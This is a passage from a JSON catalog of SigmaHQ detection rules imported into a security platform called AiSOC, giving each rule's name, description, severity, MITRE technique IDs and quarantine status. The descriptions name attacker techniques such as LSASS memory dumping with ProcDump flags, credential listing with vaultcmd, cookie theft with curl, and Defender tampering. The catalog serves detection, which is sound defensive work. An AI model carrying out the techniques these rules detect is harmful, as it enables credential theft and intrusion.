"sigmahq-sigma-58800443-f9fc-4d55-ae0c-98a3966dfb97", "type": "detection", "name": "System Network Discovery - macOS", "description": "Detects enumeration of local network configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58800443-f9fc-4d55-ae0c-98a3966dfb97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml" } }, { "id": "sigmahq-sigma-589ac73f-8e12-409c-964e-31a2f5775ae2", "type": "detection", "name": "HackTool - WSASS Execution", "description": "Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's\n(Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-wsass-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "589ac73f-8e12-409c-964e-31a2f5775ae2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_wsass.yml" } }, { "id": "sigmahq-sigma-58af08eb-f9e1-43c8-9805-3ad9b0482bd8", "type": "detection", "name": "Invalid PIM License", "description": "Identifies when an organization doesn't have the proper license for PIM and is out of compliance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invalid-pim-license.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58af08eb-f9e1-43c8-9805-3ad9b0482bd8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml" } }, { "id": "sigmahq-sigma-58c0bff0-40a0-46e8-b5e8-b734b84d2017", "type": "detection", "name": "Certificate Exported From Local Certificate Store", "description": "Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-from-local-certificate-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58c0bff0-40a0-46e8-b5e8-b734b84d2017", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml" } }, { "id": "sigmahq-sigma-58cb02d5-78ce-4692-b3e1-dce850aae41a", "type": "detection", "name": "Alternate PowerShell Hosts Pipe", "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/alternate-powershell-hosts-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml" } }, { "id": "sigmahq-sigma-58d31a75-a4f8-4c40-985b-373d58162ca2", "type": "detection", "name": "Kubernetes Secrets Modified or Deleted", "description": "Detects when Kubernetes Secrets are Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-secrets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58d31a75-a4f8-4c40-985b-373d58162ca2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "type": "detection", "name": "Suspicious Serv-U Process Pattern", "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-serv-u-process-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml" } }, { "id": "sigmahq-sigma-58f50261-c53b-4c88-bd12-1d71f12eda4c", "type": "detection", "name": "Windows Credential Manager Access via VaultCmd", "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-manager-access-via-vaultcmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml" } }, { "id": "sigmahq-sigma-58f88172-a73d-442b-94c9-95eaed3cbb36", "type": "detection", "name": "New Federated Domain Added", "description": "Detects the addition of a new Federated Domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-federated-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "58f88172-a73d-442b-94c9-95eaed3cbb36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml" } }, { "id": "sigmahq-sigma-590a5f4c-6c8c-4f10-8307-89afe9453a9d", "type": "detection", "name": "Suspicious Child Process Created as System", "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-created-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" } }, { "id": "sigmahq-sigma-5947497f-1aa4-41dd-9693-c9848d58727d", "type": "detection", "name": "Suspicious Unblock-File", "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-unblock-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5947497f-1aa4-41dd-9693-c9848d58727d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" } }, { "id": "sigmahq-sigma-597a7e84-187d-458b-9e4f-2f5a0e676711", "type": "detection", "name": "Kubernetes Potential Enumeration Activity", "description": "Detects potential Kubernetes enumeration or attack activity via the audit log.\nThis includes the execution of common shells, utilities, or specialized tools like 'Rakkess' (access_matrix) and 'TruffleHog' via Kubernetes API requests.\nAttackers use these methods to perform reconnaissance (enumeration), secret harvesting, or execute code (exec) within a cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1609", "T1613" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-potential-enumeration-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "597a7e84-187d-458b-9e4f-2f5a0e676711", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_potential_enumeration_activity.yml" } }, { "id": "sigmahq-sigma-598290cf-5932-45cd-9123-be1e05ab4f2e", "type": "detection", "name": "OpenCanary - RDP New Connection Attempt", "description": "Detects instances where an RDP service on an OpenCanary node has had a connection attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-rdp-new-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "598290cf-5932-45cd-9123-be1e05ab4f2e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_rdp_connection_attempt.yml" } }, { "id": "sigmahq-sigma-59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "type": "detection", "name": "Execute Code with Pester.bat", "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-code-with-pester-bat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml" } }, { "id": "sigmahq-sigma-59ec40bb-322e-40ab-808d-84fa690d7e56", "type": "detection", "name": "Nginx Core Dump", "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1499.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nginx-core-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "59ec40bb-322e-40ab-808d-84fa690d7e56", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/product/nginx/web_nginx_core_dump.yml" } }, { "id": "sigmahq-sigma-5a105d34-05fc-401e-8553-272b45c1522d", "type": "detection", "name": "CobaltStrike Service Installations - System", "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-service-installations-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a105d34-05fc-401e-8553-272b45c1522d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml" } }, { "id": "sigmahq-sigma-5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", "type": "detection", "name": "Persistence Via New SIP Provider", "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/persistence-via-new-sip-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_sip_persistence.yml" } }, { "id": "sigmahq-sigma-5a3164f2-b373-4152-93cf-090b13c12d27", "type": "detection", "name": "Potentially Suspicious Child Process Of VsCode", "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-vscode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a3164f2-b373-4152-93cf-090b13c12d27", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml" } }, { "id": "sigmahq-sigma-5a44727c-3b85-4713-8c44-4401d5499629", "type": "detection", "name": "Replay Attack Detected", "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/replay-attack-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a44727c-3b85-4713-8c44-4401d5499629", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_replay_attack_detected.yml" } }, { "id": "sigmahq-sigma-5a5152f1-463f-436b-b2f5-8eceb3964b42", "type": "detection", "name": "Displaying Hidden Files Feature Disabled", "description": "Detects modifications to the \"Hidden\" and \"ShowSuperHidden\" explorer registry values in order to disable showing of hidden files and system files.\nThis technique is abused by several malware families to hide their files from normal users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/displaying-hidden-files-feature-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hide_file.yml" } }, { "id": "sigmahq-sigma-5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d", "type": "detection", "name": "Cmd Launched with Hidden Start Flags to Suspicious Targets", "description": "Detects cmd.exe executing commands with the \"start\" utility using \"/b\" (no window) or \"/min\" (minimized) flags.\nTo reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories.\nThis technique was observed in Chaos, DarkSide, and Emotet malware campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cmd-launched-with-hidden-start-flags-to-suspicious-targets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag.yml" } }, { "id": "sigmahq-sigma-5a6e1e16-07de-48d8-8aae-faa766c05e88", "type": "detection", "name": "Potential Cookies Session Hijacking", "description": "Detects execution of \"curl.exe\" with the \"-c\" flag in order to save cookie data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-cookies-session-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a6e1e16-07de-48d8-8aae-faa766c05e88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml" } }, { "id": "sigmahq-sigma-5a93eb65-dffa-4543-b761-94aa60098fb6", "type": "detection", "name": "Registry Hide Function from User", "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-hide-function-from-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hide_function_user.yml" } }, { "id": "sigmahq-sigma-5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f", "type": "detection", "name": "Windows Defender Threat Severity Default Action Modified", "description": "Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.\nThis is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,\nallowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-threat-severity-default-action-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_defender_threat_action_modified.yml" } }, { "id": "sigmahq-sigma-5aad0995-46ab-41bd-a9ff-724f41114971", "type": "detection", "name": "Esentutl Volume Shadow Copy Service Keys", "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esentutl-volume-shadow-copy-service-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5aad0995-46ab-41bd-a9ff-724f41114971", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" } }, { "id": "sigmahq-sigma-5aecf3d5-f8a0-48e7-99be-3a759df7358f", "type": "detection", "name": "App Granted Privileged Delegated Or App Permissions", "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/app-granted-privileged-delegated-or-app-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml" } }, { "id": "sigmahq-sigma-5af54681-df95-4c26-854f-2565e13cfab0", "type": "detection", "name": "Successful Account Login Via WMI", "description": "Detects successful logon attempts performed with WMI", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/successful-account-login-via-wmi.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5af54681-df95-4c26-854f-2565e13cfab0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml" } }, { "id": "sigmahq-sigma-5afa454e-030c-4ab4-9253-a90aa7fcc581", "type": "detection", "name": "Device Registration or Join Without MFA", "description": "Monitor and alert for device registration or join events where MFA was not performed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/device-registration-or-join-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5afa454e-030c-4ab4-9253-a90aa7fcc581", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml" } }, { "id": "sigmahq-sigma-5afee48e-67dd-4e03-a783-f74259dcf998", "type": "detection", "name": "Potential LSASS Process Dump Via Procdump", "description": "Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.\nThis rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.\nLSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.\nAttackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-lsass-process-dump-via-procdump.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5afee48e-67dd-4e03-a783-f74259dcf998", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml" } }, { "id": "sigmahq-sigma-5b16df71-8615-4f7f-ac9b-6c43c0509e61", "type": "detection", "name": "Hide Schedule Task Via Index Value Tamper", "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hide-schedule-task-via-index-value-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" } }, { "id": "sigmahq-sigma-5b175490-b652-4b02-b1de-5b5b4083c5f8", "type": "detection", "name": "RedMimicry Winnti Playbook Registry Manipulation", "description": "Detects actions caused by the RedMimicry Winnti playbook", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 